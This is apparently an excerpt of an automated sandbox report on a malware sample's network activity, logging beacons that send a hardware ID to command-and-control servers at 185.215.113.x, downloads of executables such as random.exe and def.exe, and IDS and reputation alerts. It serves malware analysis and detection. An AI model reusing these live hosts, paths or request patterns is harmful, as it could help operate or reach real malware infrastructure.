69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 44 47 49 45 43 46 43 41 4b 4b 46 48 49 49 49 4a 45 2d 2d 0d 0a Data Ascii: ------JJJDGIECFCAKKFHIIIJEContent-Disposition: form-data; name="hwid"A48588DEC639786254513------JJJDGIECFCAKKFHIIIJEContent-Disposition: form-data; name="build"doma------JJJDGIECFCAKKFHIIIJE--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 31 32 34 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1001244001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /test/num.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBKFIECBGDHJKECAKFBGHost: 185.215.113.37Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 4b 46 49 45 43 42 47 44 48 4a 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 34 38 35 38 38 44 45 43 36 33 39 37 38 36 32 35 34 35 31 33 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 46 49 45 43 42 47 44 48 4a 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 46 49 45 43 42 47 44 48 4a 4b 45 43 41 4b 46 42 47 2d 2d 0d 0a Data Ascii: ------CBKFIECBGDHJKECAKFBGContent-Disposition: form-data; name="hwid"A48588DEC639786254513------CBKFIECBGDHJKECAKFBGContent-Disposition: form-data; name="build"doma------CBKFIECBGDHJKECAKFBG--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 31 32 34 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1001245001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 45 37 37 42 30 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12E77B05B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDBKJJKEBGHIDGCBKJJDHost: 185.215.113.37Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 42 4b 4a 4a 4b 45 42 47 48 49 44 47 43 42 4b 4a 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 34 38 35 38 38 44 45 43 36 33 39 37 38 36 32 35 34 35 31 33 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 4b 4a 4a 4b 45 42 47 48 49 44 47 43 42 4b 4a 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 4b 4a 4a 4b 45 42 47 48 49 44 47 43 42 4b 4a 4a 44 2d 2d 0d 0a Data Ascii: ------JDBKJJKEBGHIDGCBKJJDContent-Disposition: form-data; name="hwid"A48588DEC639786254513------JDBKJJKEBGHIDGCBKJJDContent-Disposition: form-data; name="build"doma------JDBKJJKEBGHIDGCBKJJD--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 45 37 37 42 30 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12E77B05B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 45 37 37 42 30 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12E77B05B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 45 37 37 42 30 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12E77B05B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAKFBGCBFHIJKECGIIJHost: 185.215.113.37Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 41 4b 46 42 47 43 42 46 48 49 4a 4b 45 43 47 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 34 38 35 38 38 44 45 43 36 33 39 37 38 36 32 35 34 35 31 33 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 4b 46 42 47 43 42 46 48 49 4a 4b 45 43 47 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 4b 46 42 47 43 42 46 48 49 4a 4b 45 43 47 49 49 4a 2d 2d 0d 0a Data Ascii: ------HCAKFBGCBFHIJKECGIIJContent-Disposition: form-data; name="hwid"A48588DEC639786254513------HCAKFBGCBFHIJKECGIIJContent-Disposition: form-data; name="build"doma------HCAKFBGCBFHIJKECGIIJ--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 45 37 37 42 30 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12E77B05B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGCFCAKFHCGCBFHCGHDHost: 185.215.113.37Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 47 43 46 43 41 4b 46 48 43 47 43 42 46 48 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 34 38 35 38 38 44 45 43 36 33 39 37 38 36 32 35 34 35 31 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 43 46 43 41 4b 46 48 43 47 43 42 46 48 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 43 46 43 41 4b 46 48 43 47 43 42 46 48 43 47 48 44 2d 2d 0d 0a Data Ascii: ------KEGCFCAKFHCGCBFHCGHDContent-Disposition: form-data; name="hwid"A48588DEC639786254513------KEGCFCAKFHCGCBFHCGHDContent-Disposition: form-data; name="build"doma------KEGCFCAKFHCGCBFHCGHD--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 45 37 37 42 30 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12E77B05B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 45 37 37 42 30 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12E77B05B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFBGDGIDBAAEBFHJKJDGHost: 185.215.113.37Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 42 47 44 47 49 44 42 41 41 45 42 46 48 4a 4b 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 34 38 35 38 38 44 45 43 36 33 39 37 38 36 32 35 34 35 31 33 0d 0a 2d 2d 2d 2d 2d 2d 42 46 42 47 44 47 49 44 42 41 41 45 42 46 48 4a 4b 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 42 46 42 47 44 47 49 44 42 41 41 45 42 46 48 4a 4b 4a 44 47 2d 2d 0d 0a Data Ascii: ------BFBGDGIDBAAEBFHJKJDGContent-Disposition: form-data; name="hwid"A48588DEC639786254513------BFBGDGIDBAAEBFHJKJDGContent-Disposition: form-data; name="build"doma------BFBGDGIDBAAEBFHJKJDG--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 45 37 37 42 30 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12E77B05B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIJJKECFCFBGDHIECAAFHost: 185.215.113.37Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 4a 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 34 38 35 38 38 44 45 43 36 33 39 37 38 36 32 35 34 35 31 33 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 2d 2d 0d 0a Data Ascii: ------FIJJKECFCFBGDHIECAAFContent-Disposition: form-data; name="hwid"A48588DEC639786254513------FIJJKECFCFBGDHIECAAFContent-Disposition: form-data; name="build"doma------FIJJKECFCFBGDHIECAAF--
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 104.21.53.8 104.21.53.8
Source: Joe Sandbox View IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View IP Address: 185.215.113.37 185.215.113.37
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49725 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49959 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49981 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49999 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50005 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:50005 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:50023 -> 185.215.113.16:80
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /test/num.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
